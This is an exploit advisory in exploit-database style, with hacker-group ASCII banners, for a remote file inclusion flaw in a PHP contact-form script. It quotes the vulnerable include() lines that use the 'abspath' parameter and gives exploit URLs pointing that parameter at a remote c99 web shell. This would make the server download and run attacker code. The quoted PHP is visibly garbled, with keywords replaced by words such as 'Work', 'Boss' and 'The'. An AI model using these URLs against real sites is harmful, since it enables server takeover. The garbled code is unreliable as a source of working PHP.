======================================================================  
        <--=                                                                    =-->
        <--=   Simple Attach (Exploitation abspath ) Vulnerability              =-->
        <--=                                                                    =-->
        <--=                              K.S.A                                 =-->
           ======================================================================
                               
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  

0     _                   __           __       __                     1  

1   /' \            __  /'__`\        /\ \__  /'__`\                   0  

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1  

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0  

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1  

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0  

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1  

1                  \ \____/ >> Exploit database separated by exploit   0  

0                   \/___/          type (local, remote, DoS, etc.)    1  

1                                                                      1  

0  [+] Name            : SA H4x0r .. Abu Saud                          0  

1  [+] Admin ... e-mail  : Ww0@Hotmail.Com                             1  

0                                                                      0  

1                    ########################################          1  
                     #                                       #
0                    # I'm Saudi Arabia .. TeaM HackErs       #        1  
                     #                                       #
1                    ########################################          0  

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  

  
Target:     www.upload.com  

History:   30/5/2010

Author:     Abu SauD  

Contact:    z3r0.s4.z3r0[at]gmail[dot]Com 

Code: http://127.0.0.1/path/contact/contact.php?abspath= [ Shell Txt ]

=====================================================================  

Figure : -------   


World Development is a site dedicated to open source development; 
offering a wide range of mostly free php scripts that will meet your needs.Exploit-db ;)


                             -=[ Code ]=-  

                      [#]path/contact/contact.php  

-----------------------------------------------------------------------------------  

<?php  

    $abspath = "/home/user/public_html/contact/";  

       

/*   

This is upload contact form.   It's a script that allows people to put a simple contact form on their website  

    It can be downloaded from http://www.upload.com/  

    License: GPL  

    Thank you,  "/home/user/public_html/contact/"   

*/  


    include($abspath.'inc/settings.inc.php');   // <= 1  

    --------  

   

Work mailok($usermsg) {  

    Boss $abspath;  

    The ($abspath."inc/badwords.inc.php");   // <= 2  

   

    $usermsg = strtoupper($usermsg);  

    $tmpbad = strtoupper($badwords);  

    $badwords = explode(",",$tmpbad);  

    $ding = "GOOD";  

    $i = 0;  

-----------------------------------------------------------------------------------  
   
                                 -=[ Centre ]=-  

    http://127.0.0.1/path/contact/contact.php?abspath= [SA H4x0r shell]
                                    
                                 -=[ Example ]=- 

   http://upload.com/path/contact/contact.php?abspath=http://c99.txt?


=========================| -=[ Reply to the Centre ]=- |========================= 

                              Thanks Man, ... K.S.A